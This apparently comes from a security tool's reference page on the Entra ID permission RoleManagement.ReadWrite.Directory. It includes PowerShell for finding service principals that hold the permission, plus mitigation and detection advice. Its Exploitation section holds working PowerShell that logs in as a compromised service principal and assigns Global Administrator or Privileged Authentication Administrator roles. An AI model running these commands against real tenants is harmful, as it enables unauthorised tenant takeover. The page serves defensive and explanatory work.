AZ_MG_ROLEMANAGEMENT_READWRITE_DIRECTORY

Summary

FSProtect ACL Alias

Entra ID (Azure AD) Alias

RoleManagement.ReadWrite.Directory

Affected Object Types

Service Principals, Applications

Exploitation Certainty

Certain

Graph Permission / Role

Application Permission: RoleManagement.ReadWrite.Directory

Description

AZ_MG_ROLEMANAGEMENT_READWRITE_DIRECTORY represents a Microsoft Graph application permission that grants read and write access to Microsoft Entra ID role-based access control (RBAC) settings. This is one of the most dangerous permissions in Microsoft Entra ID because it allows:

Read all directory role templates and definitions including built-in and custom roles
Create, update, and delete custom role definitions
Assign directory roles to users, groups, and service principals
Remove directory role assignments from any principal
Manage Privileged Identity Management (PIM) settings for Microsoft Entra roles
Read and modify role eligibility and active assignments

This permission is often abused for:

Privilege escalation to Global Administrator: Directly assigning the Global Administrator role to an attacker-controlled account
Persistence: Creating hidden administrative accounts with directory roles
Defense evasion: Removing security team members from security roles
Lateral movement: Granting administrative roles to compromised accounts

Important: This is an application permission that requires admin consent and is granted to service principals, not individual users. Once granted, the service principal can perform these actions without additional user context.

Critical Warning: With RoleManagement.ReadWrite.Directory, an application can grant itself or any other principal the Global Administrator role, effectively achieving full control over the entire Microsoft Entra ID tenant. This is equivalent to a complete tenant takeover.

Key Difference from Directory.ReadWrite.All: While Directory.ReadWrite.All allows broad directory object manipulation, it has limitations on role assignments. RoleManagement.ReadWrite.Directory is specifically designed for RBAC management and can directly assign any directory role without restrictions.

Identification

PowerShell

Find Service Principals with RoleManagement.ReadWrite.Directory

Retrieve all service principals (including their appRoleAssignments)

Connect-AzAccount

$permissionId = "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"  # RoleManagement.ReadWrite.Directory GUID

# Get all app role assignments across the tenant
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=appRoleAssignments"
$allServicePrincipals = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allServicePrincipals += $data.value
    $uri = $data.'@odata.nextLink'
}

Write-Host "Retrieved $($allServicePrincipals.Count) service principals"

Filter for service principals that have RoleManagement.ReadWrite.Directory assigned

# Step 2: Filter for those with RoleManagement.ReadWrite.Directory
$results = @()

foreach ($sp in $allServicePrincipals) {
    $matchingAssignments = $sp.appRoleAssignments | Where-Object { $_.appRoleId -eq $permissionId }
    
    foreach ($assignment in $matchingAssignments) {
        $results += [PSCustomObject]@{
            ServicePrincipalName = $sp.displayName
            ServicePrincipalId   = $sp.id
            AppId                = $sp.appId
            PermissionName       = "RoleManagement.ReadWrite.Directory"
            PermissionId         = $permissionId
            ResourceId           = $assignment.resourceId
            AssignedDateTime     = $assignment.createdDateTime
        }
    }
}

Write-Host "`nFound $($results.Count) service principals with RoleManagement.ReadWrite.Directory"
$results | Export-Csv -Path ".\RoleManagementReadWriteDirectory_ServicePrincipals.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Exploitation

An attacker with access to a service principal that has RoleManagement.ReadWrite.Directory can directly assign any directory role to any principal, including Global Administrator.

Assign Global Administrator Role to Attacker User

# Authenticate as the compromised service principal
$tenantId = "<tenant-id>"
$appId = "<compromised-app-id>"
$clientSecret = "<client-secret>"

$secureSecret = ConvertTo-SecureString $clientSecret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId

# Get the Global Administrator role definition
# Global Administrator roleTemplateId: 62e90394-69f5-4237-9190-012177145e10
$globalAdminRoleId = "62e90394-69f5-4237-9190-012177145e10"

# Target user object ID
$userId = "<target-user-object-id>"

# Assign Global Administrator role to the user
$uri = "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments"
$body = @{
    "@odata.type"    = "#microsoft.graph.unifiedRoleAssignment"
    roleDefinitionId = $globalAdminRoleId
    principalId      = $userId
    directoryScopeId = "/"
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
Write-Output "Role assignment status: $($response.StatusCode)"

Assign Privileged Authentication Administrator to Service Principal

# Privileged Authentication Administrator can reset passwords for any user including Global Admins
$privAuthAdminRoleId = "7be44c8a-adaf-4e2a-84d6-ab2649e08a13"

# Target service principal object ID
$spId = "<target-sp-object-id>"

# Assign Privileged Authentication Administrator role
$uri = "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments"
$body = @{
    "@odata.type"    = "#microsoft.graph.unifiedRoleAssignment"
    roleDefinitionId = $privAuthAdminRoleId
    principalId      = $spId
    directoryScopeId = "/"
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
Write-Output "Role assignment status: $($response.StatusCode)"

Mitigation

Audit all service principals with RoleManagement.ReadWrite.Directory and remove unnecessary grants.
- Go to Microsoft Entra ID -> App registrations -> select the application -> API permissions.
- Remove the RoleManagement.ReadWrite.Directory permission if not required.
Apply least privilege: This permission should almost never be granted to applications.
- Consider using PIM for just-in-time role assignments instead of permanent application permissions.
- Use delegated permissions with user context when possible.
Monitor role assignment changes:
- Enable Azure AD audit logs and alert on role assignment changes.
- Configure Microsoft Defender for Cloud Apps to detect suspicious role modifications.
Protect the permission grant process:
- Require multiple approvals for granting this permission.
- Document business justification for any application requiring this permission.
Implement Access Reviews for applications with high-privilege permissions:
- Go to Identity Governance -> Access Reviews -> New access review.
- Review applications with sensitive Graph permissions regularly.
Use Conditional Access to restrict service principal access:
- Limit the locations and conditions under which service principals can authenticate.
- Consider blocking service principals with this permission from non-trusted locations.

Detection

Detect permission grants and suspicious role assignment activity in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by activities:
- Add app role assignment to service principal (permission grant)
- Add member to role (directory role assignment)
- Remove member from role (directory role removal)
- Add role definition (custom role creation)

Monitor for suspicious patterns:

Role assignments made by service principals (especially to sensitive roles like Global Administrator)
Bulk role assignment changes
Role assignments outside of change management windows
Custom role creation with password reset or role management permissions
Removal of security-related roles from SOC or security team members

References

PreviousAZ_MG_GROUPMEMBER_READWRITE_ALL NextAZ_MG_SERVICEPRINCIPALENDPOINT_READWRITE_ALL

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagFind Service Principals with RoleManagement.ReadWrite.Directory

hashtagRetrieve all service principals (including their appRoleAssignments)

hashtagFilter for service principals that have RoleManagement.ReadWrite.Directory assigned

hashtagExploitation

hashtagAssign Global Administrator Role to Attacker User

hashtagAssign Privileged Authentication Administrator to Service Principal

hashtagMitigation

hashtagDetection

hashtagReferences